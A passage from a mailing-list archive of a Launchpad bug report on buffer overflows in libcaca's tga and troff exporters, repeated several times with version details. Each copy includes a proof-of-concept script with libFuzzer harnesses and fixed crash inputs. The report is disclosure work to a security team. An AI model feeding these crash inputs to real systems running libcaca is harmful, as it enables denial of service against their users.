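  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if(Size<8) return 0;
    char* buffer = (char*)malloc(Size+1);
    if(buffer == NULL) return 0;  // out of memory: nothing to test
    memcpy(buffer,Data,Size);
    buffer[Size]='\0';
    caca_canvas_t *cv = caca_create_canvas(0,0);
    if(cv == NULL) { free(buffer); return 0; }  // NULL on failure
    for(int i=0;i<4;i++)
      caca_create_frame(cv,0);
    for(int i=0;i<4;i++){
      caca_set_frame(cv,i);
      // strlen() stops at the first NUL byte, so only the leading run of
      // non-NUL input bytes is imported into each frame.
      caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
    }
    // NOTE(review): the third argument is missing in the archived text
    // ("troff",)); &len, the exported-size out-parameter, is what the
    // declared size_t len is for -- confirm against the original file.
    size_t len=0;
    void* reData = caca_export_canvas_to_memory(cv,"troff",&len);
    if(reData!=NULL) free(reData);
    caca_free_canvas(cv);
    free(buffer);
    return 0;
  }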

  
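  // Fixed 9-byte input handed straight to the fuzzer entry point; the
  // command-line arguments are unused.
  int main(int args,char* argv[]){
    (void)args;
    (void)argv;
    unsigned char buffer[] =
      {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
    size_t len = sizeof(buffer)/sizeof(buffer[0]);
    LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
    // %zu matches size_t; the original %d was undefined behaviour.
    printf("%zu\n",len);
    return 0;
  }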
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

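  // libFuzzer entry point: copy the input into a NUL-terminated buffer, import
  // it into each of four canvas frames with the default ("") codec, export the
  // canvas with the "tga" codec and free everything. Always returns 0.
  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if(Size<8) return 0;
    char* buffer = (char*)malloc(Size+1);
    if(buffer == NULL) return 0;  // out of memory: nothing to test
    memcpy(buffer,Data,Size);
    buffer[Size]='\0';
    caca_canvas_t *cv = caca_create_canvas(0,0);
    if(cv == NULL) { free(buffer); return 0; }  // NULL on failure
    for(int i=0;i<4;i++)
      caca_create_frame(cv,0);
    for(int i=0;i<4;i++){
      caca_set_frame(cv,i);
      // strlen() stops at the first NUL byte, so only the leading run of
      // non-NUL input bytes is imported into each frame.
      caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
    }
    // NOTE(review): the third argument is missing in the archived text
    // ("tga",)); &len, the exported-size out-parameter, is what the
    // declared size_t len is for -- confirm against the original file.
    size_t len=0;
    void* reData = caca_export_canvas_to_memory(cv,"tga",&len);
    if(reData!=NULL) free(reData);
    caca_free_canvas(cv);
    free(buffer);
    return 0;
  }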

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 

[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-04-11 Thread xiao huang
** Summary changed:

- libcaca buffer-overflow
+ buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

-- 
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I used libFuzzer to test the libcaca API and found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code files (as in the call stack):

 ->caca_export_canvas_to_memory()  in
  libcaca/caca/codec/export.c

 ->caca_export_memory()in
  libcaca/caca/codec/export.c

 -> export_tga()in  
libcaca/caca/codec/export.c

-> export_troff()   in  
libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

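  // libFuzzer entry point: copy the input into a NUL-terminated buffer, import
  // it into each of four canvas frames with the default ("") codec, export the
  // canvas with the "troff" codec and free everything. Always returns 0, as
  // libFuzzer requires (the original fell off the end of a non-void function).
  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if(Size<8) return 0;
    char* buffer = (char*)malloc(Size+1);
    if(buffer == NULL) return 0;  // out of memory: nothing to test
    memcpy(buffer,Data,Size);
    buffer[Size]='\0';
    caca_canvas_t *cv = caca_create_canvas(0,0);
    if(cv == NULL) { free(buffer); return 0; }  // NULL on failure
    for(int i=0;i<4;i++)
      caca_create_frame(cv,0);
    for(int i=0;i<4;i++){
      caca_set_frame(cv,i);
      // strlen() stops at the first NUL byte, so only the leading run of
      // non-NUL input bytes is imported into each frame.
      caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
    }
    // NOTE(review): the third argument is missing in the archived text
    // ("troff",)); &len, the exported-size out-parameter, is what the
    // declared size_t len is for -- confirm against the original file.
    size_t len=0;
    void* reData = caca_export_canvas_to_memory(cv,"troff",&len);
    if(reData!=NULL) free(reData);
    caca_free_canvas(cv);
    free(buffer);
    return 0;
  }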

  
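  // Fixed 9-byte input handed straight to the fuzzer entry point; the
  // command-line arguments are unused.
  int main(int args,char* argv[]){
    (void)args;
    (void)argv;
    unsigned char buffer[] =
      {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11};
    size_t len = sizeof(buffer)/sizeof(buffer[0]);
    LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
    // %zu matches size_t; the original %d was undefined behaviour.
    printf("%zu\n",len);
    return 0;
  }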
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

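  // libFuzzer entry point: copy the input into a NUL-terminated buffer, import
  // it into each of four canvas frames with the default ("") codec, export the
  // canvas with the "tga" codec and free everything. Always returns 0.
  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    if(Size<8) return 0;
    char* buffer = (char*)malloc(Size+1);
    if(buffer == NULL) return 0;  // out of memory: nothing to test
    memcpy(buffer,Data,Size);
    buffer[Size]='\0';
    caca_canvas_t *cv = caca_create_canvas(0,0);
    if(cv == NULL) { free(buffer); return 0; }  // NULL on failure
    for(int i=0;i<4;i++)
      caca_create_frame(cv,0);
    for(int i=0;i<4;i++){
      caca_set_frame(cv,i);
      // strlen() stops at the first NUL byte, so only the leading run of
      // non-NUL input bytes is imported into each frame.
      caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
    }
    // NOTE(review): the third argument is missing in the archived text
    // ("tga",)); &len, the exported-size out-parameter, is what the
    // declared size_t len is for -- confirm against the original file.
    size_t len=0;
    void* reData = caca_export_canvas_to_memory(cv,"tga",&len);
    if(reData!=NULL) free(reData);
    caca_free_canvas(cv);
    free(buffer);
    return 0;
  }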

  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
{0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11};
 len = sizeof(buffer)/sizeof(unsigned char);
 LLVMFuzzerTestOneInput((const uint8_t*)buffer,len);
 

[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow

2021-04-10 Thread xiao huang
Debian 10
libcaca0/now 0.9.beta19-2.1

Fedora 33
Name: libcaca 
version : 0.99 
Release :0.51.beta19.fc33

https://bugs.launchpad.net/bugs/1923273

Title:
  libcaca buffer-overflow

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I used libFuzzer to test the libcaca API and found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code files (as in the call stack):

  -> caca_export_canvas_to_memory()  in libcaca/caca/codec/export.c

  -> caca_export_memory()            in libcaca/caca/codec/export.c

  -> export_tga()                    in libcaca/caca/codec/export.c

  -> export_troff()                  in libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make
  ```

  3. Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

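  /*
   * libFuzzer entry point for the "troff" exporter.
   *
   * Copies the fuzz input into a NUL-terminated buffer, creates a canvas,
   * calls caca_create_frame() four times, imports the input into frames
   * 0..3 and then exports the canvas as "troff".  Inputs shorter than
   * 8 bytes are ignored.
   *
   * Data/Size: the fuzz input (read only).
   * Returns 0, as libFuzzer expects from a harness.  The original listing
   * fell off the end of the function without a return value, which is
   * undefined behaviour for a non-void function.
   */
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
      if (Size < 8) return 0;

      /* One extra byte for the terminator: the import below is fed strlen(). */
      char *buffer = static_cast<char *>(malloc(Size + 1));
      if (buffer == NULL) return 0;
      memcpy(buffer, Data, Size);
      buffer[Size] = '\0';

      caca_canvas_t *cv = caca_create_canvas(0, 0);
      if (cv == NULL) {
          free(buffer);
          return 0;
      }
      for (int i = 0; i < 4; i++)
          caca_create_frame(cv, 0);
      for (int i = 0; i < 4; i++) {
          caca_set_frame(cv, i);
          /* NOTE(review): strlen() stops at the first NUL byte, so an input
           * containing 0x00 is truncated here; pass Size instead if the whole
           * input should reach the importer. */
          caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
      }

      /* The third argument is an out-parameter receiving the exported size. */
      size_t len = 0;
      void *reData = caca_export_canvas_to_memory(cv, "troff", &len);
      free(reData); /* free(NULL) is a no-op, so no NULL check is needed */
      caca_free_canvas(cv);
      free(buffer);
      return 0;
  }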

  
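  /*
   * Stand-alone driver: runs the harness once on the fixed input used to
   * reproduce the reported "troff" export crash, then prints the input
   * length.  Command-line arguments are not used.
   */
  int main(int args, char *argv[]) {
      (void)args;
      (void)argv;
      unsigned char buffer[] = {0x5f, 0x20, 0x6f, 0x75, 0x6e, 0x64, 0x0a, 0x40, 0x11};
      size_t len = sizeof buffer / sizeof buffer[0];
      LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
      /* size_t must be printed with %zu; "%d" was a format/argument mismatch. */
      printf("%zu\n", len);
      return 0;
  }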
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

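  /*
   * libFuzzer entry point for the "tga" exporter.
   *
   * Copies the fuzz input into a NUL-terminated buffer, creates a canvas,
   * calls caca_create_frame() four times, imports the input into frames
   * 0..3 and then exports the canvas as "tga".  Inputs shorter than
   * 8 bytes are ignored.
   *
   * Data/Size: the fuzz input (read only).
   * Returns 0, as libFuzzer expects from a harness; allocation failures
   * also return 0 after releasing what was acquired.
   */
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
      if (Size < 8) return 0;

      /* One extra byte for the terminator: the import below is fed strlen(). */
      char *buffer = static_cast<char *>(malloc(Size + 1));
      if (buffer == NULL) return 0;
      memcpy(buffer, Data, Size);
      buffer[Size] = '\0';

      caca_canvas_t *cv = caca_create_canvas(0, 0);
      if (cv == NULL) {
          free(buffer);
          return 0;
      }
      for (int i = 0; i < 4; i++)
          caca_create_frame(cv, 0);
      for (int i = 0; i < 4; i++) {
          caca_set_frame(cv, i);
          /* NOTE(review): strlen() stops at the first NUL byte, so an input
           * containing 0x00 is truncated here; pass Size instead if the whole
           * input should reach the importer. */
          caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
      }

      /* The third argument is an out-parameter receiving the exported size. */
      size_t len = 0;
      void *reData = caca_export_canvas_to_memory(cv, "tga", &len);
      free(reData); /* free(NULL) is a no-op, so no NULL check is needed */
      caca_free_canvas(cv);
      free(buffer);
      return 0;
  }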

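  /*
   * Stand-alone driver: runs the harness once on the fixed input used to
   * reproduce the reported "tga" export crash, then prints the input
   * length.  Command-line arguments are not used.
   */
  int main(int args, char *argv[]) {
      (void)args;
      (void)argv;
      unsigned char buffer[] = {0x00, 0xff, 0xff, 0x23, 0x64, 0x72, 0x23, 0x20, 0x11};
      size_t len = sizeof buffer / sizeof buffer[0];
      LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
      /* size_t must be printed with %zu; "%d" was a format/argument mismatch. */
      printf("%zu\n", len);
      return 0;
  }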
  EOF

  clang++ -g 

[Touch-packages] [Bug 1923273] Re: libcaca buffer-overflow

2021-04-10 Thread xiao huang
source code
## Affected Product Code Base
libcaca, 0.99.beta20


Ubuntu 20.04
libcaca 0.99.beta19

https://bugs.launchpad.net/bugs/1923273

Title:
  libcaca buffer-overflow

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I used libFuzzer to test the libcaca API and found two crashes:

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code files (as in the call stack):

  -> caca_export_canvas_to_memory()  in libcaca/caca/codec/export.c

  -> caca_export_memory()            in libcaca/caca/codec/export.c

  -> export_tga()                    in libcaca/caca/codec/export.c

  -> export_troff()                  in libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make
  ```

  3. Run POC.sh to compile poc_troff.cc and poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

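  /*
   * libFuzzer entry point for the "troff" exporter.
   *
   * Copies the fuzz input into a NUL-terminated buffer, creates a canvas,
   * calls caca_create_frame() four times, imports the input into frames
   * 0..3 and then exports the canvas as "troff".  Inputs shorter than
   * 8 bytes are ignored.
   *
   * Data/Size: the fuzz input (read only).
   * Returns 0, as libFuzzer expects from a harness.  The original listing
   * fell off the end of the function without a return value, which is
   * undefined behaviour for a non-void function.
   */
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
      if (Size < 8) return 0;

      /* One extra byte for the terminator: the import below is fed strlen(). */
      char *buffer = static_cast<char *>(malloc(Size + 1));
      if (buffer == NULL) return 0;
      memcpy(buffer, Data, Size);
      buffer[Size] = '\0';

      caca_canvas_t *cv = caca_create_canvas(0, 0);
      if (cv == NULL) {
          free(buffer);
          return 0;
      }
      for (int i = 0; i < 4; i++)
          caca_create_frame(cv, 0);
      for (int i = 0; i < 4; i++) {
          caca_set_frame(cv, i);
          /* NOTE(review): strlen() stops at the first NUL byte, so an input
           * containing 0x00 is truncated here; pass Size instead if the whole
           * input should reach the importer. */
          caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
      }

      /* The third argument is an out-parameter receiving the exported size. */
      size_t len = 0;
      void *reData = caca_export_canvas_to_memory(cv, "troff", &len);
      free(reData); /* free(NULL) is a no-op, so no NULL check is needed */
      caca_free_canvas(cv);
      free(buffer);
      return 0;
  }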

  
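  /*
   * Stand-alone driver: runs the harness once on the fixed input used to
   * reproduce the reported "troff" export crash, then prints the input
   * length.  Command-line arguments are not used.
   */
  int main(int args, char *argv[]) {
      (void)args;
      (void)argv;
      unsigned char buffer[] = {0x5f, 0x20, 0x6f, 0x75, 0x6e, 0x64, 0x0a, 0x40, 0x11};
      size_t len = sizeof buffer / sizeof buffer[0];
      LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
      /* size_t must be printed with %zu; "%d" was a format/argument mismatch. */
      printf("%zu\n", len);
      return 0;
  }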
  EOF

  clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address
  -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o
  poc_troff

  
  cat << EOF > poc_tga.cc
  #include "config.h"
  #include "caca.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

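  /*
   * libFuzzer entry point for the "tga" exporter.
   *
   * Copies the fuzz input into a NUL-terminated buffer, creates a canvas,
   * calls caca_create_frame() four times, imports the input into frames
   * 0..3 and then exports the canvas as "tga".  Inputs shorter than
   * 8 bytes are ignored.
   *
   * Data/Size: the fuzz input (read only).
   * Returns 0, as libFuzzer expects from a harness; allocation failures
   * also return 0 after releasing what was acquired.
   */
  extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
      if (Size < 8) return 0;

      /* One extra byte for the terminator: the import below is fed strlen(). */
      char *buffer = static_cast<char *>(malloc(Size + 1));
      if (buffer == NULL) return 0;
      memcpy(buffer, Data, Size);
      buffer[Size] = '\0';

      caca_canvas_t *cv = caca_create_canvas(0, 0);
      if (cv == NULL) {
          free(buffer);
          return 0;
      }
      for (int i = 0; i < 4; i++)
          caca_create_frame(cv, 0);
      for (int i = 0; i < 4; i++) {
          caca_set_frame(cv, i);
          /* NOTE(review): strlen() stops at the first NUL byte, so an input
           * containing 0x00 is truncated here; pass Size instead if the whole
           * input should reach the importer. */
          caca_import_canvas_from_memory(cv, buffer, strlen(buffer), "");
      }

      /* The third argument is an out-parameter receiving the exported size. */
      size_t len = 0;
      void *reData = caca_export_canvas_to_memory(cv, "tga", &len);
      free(reData); /* free(NULL) is a no-op, so no NULL check is needed */
      caca_free_canvas(cv);
      free(buffer);
      return 0;
  }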

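  /*
   * Stand-alone driver: runs the harness once on the fixed input used to
   * reproduce the reported "tga" export crash, then prints the input
   * length.  Command-line arguments are not used.
   */
  int main(int args, char *argv[]) {
      (void)args;
      (void)argv;
      unsigned char buffer[] = {0x00, 0xff, 0xff, 0x23, 0x64, 0x72, 0x23, 0x20, 0x11};
      size_t len = sizeof buffer / sizeof buffer[0];
      LLVMFuzzerTestOneInput((const uint8_t *)buffer, len);
      /* size_t must be printed with %zu; "%d" was a format/argument mismatch. */
      printf("%zu\n", len);
      return 0;
  }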
  EOF

  clang++ -g poc_tga.cc -O2